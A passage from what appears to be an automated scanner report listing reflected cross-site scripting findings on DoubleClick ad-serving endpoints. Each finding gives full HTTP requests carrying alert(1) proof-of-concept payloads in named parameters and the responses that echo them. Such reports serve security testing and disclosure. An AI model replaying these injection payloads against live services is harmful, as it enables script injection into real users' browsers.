Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=129713180380c02"-alert(1)-"5944b1be99f&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_zero.swf-_-X_1_ML_Edge_Site
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b520"-alert(1)-"016294d38d8 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323104b520"-alert(1)-"016294d38d8&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323104b520"-alert(1)-"016294d38d8&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_ze
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce61"-alert(1)-"f8f18babff8 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957fce61"-alert(1)-"f8f18babff8&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7483

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957fce61"-alert(1)-"f8f18babff8&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/ira100.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_OneHundred.swf-_-X_1_ML_Edge_Site_Retargeting_1_31_CPA_Optimization_
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab241"-alert(1)-"953a6304c42 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094ab241"-alert(1)-"953a6304c42&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7563

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094ab241"-alert(1)-"953a6304c42&redirect=http://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_AdviceGuidance.swf-_-X_1_ML_Edge_Site_Retargeting_1_31_CPA_
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3e59"-alert(1)-"bc570207b66 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0f3e59"-alert(1)-"bc570207b66&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:25:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0f3e59"-alert(1)-"bc570207b66&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/emergency-fund.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-300x250_EmergencyFund.swf-_-X_1_ML_Edge_Site_R
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4359.xplusone.com/B4953071.40

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6336"-alert(1)-"d2c6aa2a846 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cbe6336"-alert(1)-"d2c6aa2a846&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=6684374? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 08 Feb 2011 02:24:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7452

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
net/click%3Bh%3Dv8/3aa8/f/a5/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B~sscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cbe6336"-alert(1)-"d2c6aa2a846&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=http://www.merrilledge.com/m/pages/landing4.aspx?src_cd=3PDDSP1&cm_mmc=GWM-MerrillEdge-_-xplusone.com-_-
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa54e'-alert(1)-'81bad4f984e was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064aa54e'-alert(1)-'81bad4f984e&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:28 GMT
Expires: Tue, 08 Feb 2011 02:37:28 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064aa54e'-alert(1)-'81bad4f984e&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7527390?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 857b4'-alert(1)-'08732a8e926 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091857b4'-alert(1)-'08732a8e926&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:30 GMT
Expires: Tue, 08 Feb 2011 02:37:30 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091857b4'-alert(1)-'08732a8e926&_pm=97957&_pn=17097094&redirect=;ord=7529577?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c60b'-alert(1)-'523339f5bfc was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=979573c60b'-alert(1)-'523339f5bfc&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:26 GMT
Expires: Tue, 08 Feb 2011 02:37:26 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=979573c60b'-alert(1)-'523339f5bfc&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7525343?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c07e'-alert(1)-'28d99075a5e was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=12971318034c07e'-alert(1)-'28d99075a5e&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:27 GMT
Expires: Tue, 08 Feb 2011 02:37:27 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=12971318034c07e'-alert(1)-'28d99075a5e&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7526405?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>
...[SNIP]...

1.14. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6569c'-alert(1)-'0822de605bd was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323106569c'-alert(1)-'0822de605bd&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2148
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:37:24 GMT
Expires: Tue, 08 Feb 2011 02:37:24 GMT
Connection: close

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N4359.xplusone.com/B4953071.40;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa8/f/c1/%2a/z%3B234653073%3B0-0%3B0%3B58502799%3B4307-300/250%3B40453841/40471628/1%3Bu%3D17097094%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323106569c'-alert(1)-'0822de605bd&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;ord=7524249?\" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BOR
...[SNIP]...

1.15. http://ad.doubleclick.net/adj/x1.rtb/boa/mledge/jan/boapage/rmkt [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/x1.rtb/boa/mledge/jan/boapage/rmkt

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a436'-alert(1)-'1e02b24949 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

